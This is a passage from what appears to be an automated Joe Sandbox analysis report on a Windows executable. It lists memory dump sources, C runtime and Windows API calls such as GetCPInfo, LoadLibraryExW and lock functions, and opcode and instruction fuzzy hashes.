                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: 52522cbd051c9e24f45403b8c0c97a7afe6464a8fc30ef661ff8e27c1ca42480
                                                                                  • Instruction ID: 63bfab8aebe3450882db1a4e2481deb8b8d3748d4de07caa389e51f2b2fad141
                                                                                  • Opcode Fuzzy Hash: 52522cbd051c9e24f45403b8c0c97a7afe6464a8fc30ef661ff8e27c1ca42480
                                                                                  • Instruction Fuzzy Hash: DBA02230300300CF8B00AF32AF0830C3BEFAA83AC8308A828A008C2030EF30AC028F00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 84a31bd0b8bc4c37a8752f233291ee3a4cda8af82e8a58bc752253591d799b28
                                                                                  • Instruction ID: cc07b02d75307164aa074db8f9e64934593ca84eb483c44bfb43b5681fbde6b9
                                                                                  • Opcode Fuzzy Hash: 84a31bd0b8bc4c37a8752f233291ee3a4cda8af82e8a58bc752253591d799b28
                                                                                  • Instruction Fuzzy Hash: F35179B0D102099FCB40DFA8D5919EEBBF5AB0A350F64945AE819FB310D734AA41CF65
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0c0e3cc90c27c2f49eb54f3a94144b2eee2cf69fbc6e6c318f9ff1701b7c041f
                                                                                  • Instruction ID: d31b9274953be3c91f08d50fab4bf6043693c1d40d3cc1f8e18a12146e3e9aec
                                                                                  • Opcode Fuzzy Hash: 0c0e3cc90c27c2f49eb54f3a94144b2eee2cf69fbc6e6c318f9ff1701b7c041f
                                                                                  • Instruction Fuzzy Hash: E5D06C3AA45A58AFC210DF4AE840D41F7A9FB8E670B158466EA1893B20C231F811CEE0
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(01114C70,01114C70,00000000,7FFFFFFF,?,0069A19D,01114C70,01114C70,00000000,01114C70,?,?,?,?,01114C70,00000000), ref: 0069A258
                                                                                  • __alloca_probe_16.LIBCMT ref: 0069A313
                                                                                  • __alloca_probe_16.LIBCMT ref: 0069A3A2
                                                                                  • __freea.LIBCMT ref: 0069A3ED
                                                                                  • __freea.LIBCMT ref: 0069A3F3
                                                                                  • __freea.LIBCMT ref: 0069A429
                                                                                  • __freea.LIBCMT ref: 0069A42F
                                                                                  • __freea.LIBCMT ref: 0069A43F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                  • String ID:
                                                                                  • API String ID: 127012223-0
                                                                                  • Opcode ID: 5c7ffb065ea62333731ca489153e0a6f29990a2005e28cfe5c03ae8499b7880c
                                                                                  • Instruction ID: acfe2d0dba9c9fc05706e937734e2dc5e805912f35fa8e4ce5320082f2f0fc1a
                                                                                  • Opcode Fuzzy Hash: 5c7ffb065ea62333731ca489153e0a6f29990a2005e28cfe5c03ae8499b7880c
                                                                                  • Instruction Fuzzy Hash: 6371F3729002459BEF21AFE48C81BEE77EFAF49710F284059E804A7781EA769D0187D2
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: _strrchr
                                                                                  • String ID:
                                                                                  • API String ID: 3213747228-0
                                                                                  • Opcode ID: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                  • Instruction ID: 576021b09afc6409f7170cd32ad46e8875f385a152753421d5c04db468f97b58
                                                                                  • Opcode Fuzzy Hash: cbff355201e6154b52781c3113966492e3c4af968235757aaf5a3f6f2afe1b0b
                                                                                  • Instruction Fuzzy Hash: 52B13672A04255AFDB15AF68CC81BEEBBA7EF65310F144299E905AF3C2D274D901C7B0
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F827
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0067F82F
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F8B8
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0067F8E3
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0067F938
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm
                                                                                  • API String ID: 1170836740-1018135373
                                                                                  • Opcode ID: 71e2d397b086a6db4775f3c46f6a2d7a3ac826fa0e9999f450727c94d998d904
                                                                                  • Instruction ID: f120462aa7b71c7ed498b5a85d4ad06552af5174a41f37d39299af998d14fb51
                                                                                  • Opcode Fuzzy Hash: 71e2d397b086a6db4775f3c46f6a2d7a3ac826fa0e9999f450727c94d998d904
                                                                                  • Instruction Fuzzy Hash: 7841C630A00218ABCF10EF68C845E9E7BB7AF45314F14C26AED189B352D775EE05CB95
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0067EB22
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0067EB30
                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0067EB41
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                  • API String ID: 667068680-1047828073
                                                                                  • Opcode ID: a9d49e0b6812a12444cdfaeb98405d6bf4e34d4ca42054cc08df77e0b42a1f4f
                                                                                  • Instruction ID: af8e87d92460fc587ae9d63d3bcfc609a5395057049ffb379c834174f544270a
                                                                                  • Opcode Fuzzy Hash: a9d49e0b6812a12444cdfaeb98405d6bf4e34d4ca42054cc08df77e0b42a1f4f
                                                                                  • Instruction Fuzzy Hash: 51D09E356893206F8300BB70BC0A8963E97BE476557069455F601D2665DBF41D418F94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 813973ee76c391368927db48d01d87a19e97ae2fcfd4108b3d6934888f7b3f3c
                                                                                  • Instruction ID: a5951416ea0f8d8fd1bde7dff543e7c18b9c45c48cb8d5171ba928b00ee92c67
                                                                                  • Opcode Fuzzy Hash: 813973ee76c391368927db48d01d87a19e97ae2fcfd4108b3d6934888f7b3f3c
                                                                                  • Instruction Fuzzy Hash: 00B10470A04249AFDF11EF98C891BAE7BBBBF56314F140159E401AB792CB709D46CBA4
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(?,?,00689AEB,0067F5BA,0067E585), ref: 00689B02
                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00689B10
                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00689B29
                                                                                  • SetLastError.KERNEL32(00000000,00689AEB,0067F5BA,0067E585), ref: 00689B7B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                  • String ID:
                                                                                  • API String ID: 3852720340-0
                                                                                  • Opcode ID: 584dc0fe2caebd3e31676146cb6c091e06acc425bcc5bd952480025d2b06ac19
                                                                                  • Instruction ID: 8d156b2d3aed5f5785c49dd32eefcfa06170c4fe3bf1f579c54e6a863abd32a2
                                                                                  • Opcode Fuzzy Hash: 584dc0fe2caebd3e31676146cb6c091e06acc425bcc5bd952480025d2b06ac19
                                                                                  • Instruction Fuzzy Hash: 4F012832219A116F9B6137B5FC8597B2B9BEB06771728032EF222616F1FF215C009764
                                                                                  APIs
                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 0068A4DB
                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 0068A754
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                  • String ID: csm$csm$csm
                                                                                  • API String ID: 2673424686-393685449
                                                                                  • Opcode ID: 8efa130b015e6403e5c3f8300f87b2808afddc0b60a089accde455294b0ac4ca
                                                                                  • Instruction ID: 7009716208625107aedca35593bfa1c200922fd4aed29e3df7d4509ea791a3f1
                                                                                  • Opcode Fuzzy Hash: 8efa130b015e6403e5c3f8300f87b2808afddc0b60a089accde455294b0ac4ca
                                                                                  • Instruction Fuzzy Hash: 26B18C71800209DFDF18EFE4C9419AEB7B6BF14310F18465EEC056B216E771EA91CBA6
                                                                                  APIs
                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,81500716,?,?,00000000,0069B3E5,000000FF,?,00684B4A,00000002,Ixh,00684BE6,Ixh), ref: 00684ABE
                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00684AD0
                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0069B3E5,000000FF,?,00684B4A,00000002,Ixh,00684BE6,Ixh), ref: 00684AF2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 78c646906be3ac8db1f6ab7820633cd91f1e05434861ce0d367c56ebe52be283
                                                                                  • Instruction ID: 4becbbd43ebfc21b6e4f336f2a6c76630585cddb16f97556eb2ec5952e455443
                                                                                  • Opcode Fuzzy Hash: 78c646906be3ac8db1f6ab7820633cd91f1e05434861ce0d367c56ebe52be283
                                                                                  • Instruction Fuzzy Hash: F201A735A44615AFCB11AF80DC05BAE7BFEFB45B15F010625F821A6690DFB4AD00CF94
                                                                                  APIs
                                                                                  • __alloca_probe_16.LIBCMT ref: 0068C59B
                                                                                  • __alloca_probe_16.LIBCMT ref: 0068C664
                                                                                  • __freea.LIBCMT ref: 0068C6CB
                                                                                    • Part of subcall function 0068AD61: RtlAllocateHeap.NTDLL(00000000,0068CD3A,?,?,0068CD3A,00000220,?,00000000,?), ref: 0068AD93
                                                                                  • __freea.LIBCMT ref: 0068C6DE
                                                                                  • __freea.LIBCMT ref: 0068C6EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1423051803-0
                                                                                  • Opcode ID: 8abe673cf00c6713210785718057cff513d8fbd58760f81c46150361025d6490
                                                                                  • Instruction ID: ae755cbac6dbf518b2a9a7077af44043ccb2f528212c0b11624e9dc3e39daec8
                                                                                  • Opcode Fuzzy Hash: 8abe673cf00c6713210785718057cff513d8fbd58760f81c46150361025d6490
                                                                                  • Instruction Fuzzy Hash: 6D518F72600206AFEB21BE648C81DEB7BABEF44720B25563ABD04D6241FB71DC908774
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0067E8FB
                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E91A
                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E948
                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E9A3
                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,0069B3C8,000000FF,?,0067B697), ref: 0067E9BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                  • String ID:
                                                                                  • API String ID: 66001078-0
                                                                                  • Opcode ID: 583f143fe02094bea07a95e619175f4e96629d3eb1bbf56a89643934d9a3a9b5
                                                                                  • Instruction ID: c8b5abcb2b18580c68b24e45c95122f606a32d8fa1a38a97f81b77c28fd1a074
                                                                                  • Opcode Fuzzy Hash: 583f143fe02094bea07a95e619175f4e96629d3eb1bbf56a89643934d9a3a9b5
                                                                                  • Instruction Fuzzy Hash: 36418E32600606DFCB60DF65C4859AAB3F6FF4D310B10869AE65AD7640E732F989CB51
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 0067C05B
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0067C066
                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0067C0D4
                                                                                    • Part of subcall function 0067BF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0067BF75
                                                                                  • std::locale::_Setgloballocale.LIBCPMT ref: 0067C081
                                                                                  • _Yarn.LIBCPMT ref: 0067C097
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                  • String ID:
                                                                                  • API String ID: 1088826258-0
                                                                                  • Opcode ID: 727cdb0f61d397990f33df1881d800833eed028beb9568ccb8709af8489e7f5c
                                                                                  • Instruction ID: 9a60017a488052e73cb1c4adf9f7bb2905abae51536c01676c309c722b09e0c4
                                                                                  • Opcode Fuzzy Hash: 727cdb0f61d397990f33df1881d800833eed028beb9568ccb8709af8489e7f5c
                                                                                  • Instruction Fuzzy Hash: F0019A75A001108BCB46FB209C4567D7BA3FF96720B15A04CE81A57381CF74AE82CFD9
                                                                                  APIs
                                                                                    • Part of subcall function 0068AFB3: GetLastError.KERNEL32(?,?,0068495A,006A56B0,0000000C), ref: 0068AFB7
                                                                                    • Part of subcall function 0068AFB3: SetLastError.KERNEL32(00000000), ref: 0068B059
                                                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0068509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 0068F825
                                                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0068509A,?,?,?,00000055,?,-00000050,?,?), ref: 0068F85C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_670000_uUtgy7BbF1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CodePageValid
                                                                                  • String ID: `/j$utf8
                                                                                  • API String ID: 943130320-95320002
                                                                                  • Opcode ID: 6ac76401d498221b886f367446a9e1af6c84f9757ea3a7415b5b7881945f52ea
                                                                                  • Instruction ID: 1fb9127e412af891d274115ff09ea816ae0eb7a856b3924774c53d5414acd384
                                                                                  • Opcode Fuzzy Hash: 6ac76401d498221b886f367446a9e1af6c84f9757ea3a7415b5b7881945f52ea
                                                                                  • Instruction Fuzzy Hash: 9B51C671600306BAEF25BB748C46BE673AAEF48700F150639F65597681FBB0E94087A9
                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0069535D,00000000,?,006A8180,?,?,?,00695294,00000004,InitializeCriticalSectionEx,0069F434,0069F43C), ref: 006952CE
                                                                                  • GetLastError.KERNEL32(?,0069535D,00000000,?,006A8180,?,?,?,00695294,00000004,InitializeCriticalSectionEx,0069F434,0069F43C,00000000,?,0068AA0C), ref: 006952D8
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00695300
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1336929977.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1336909550.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336952749.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336967259.00000000006A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336981031.00000000006A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1336994602.00000000006AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1337007642.00000000006AC000.00000008.00000001.01000000.00000003.sdmpDownload File
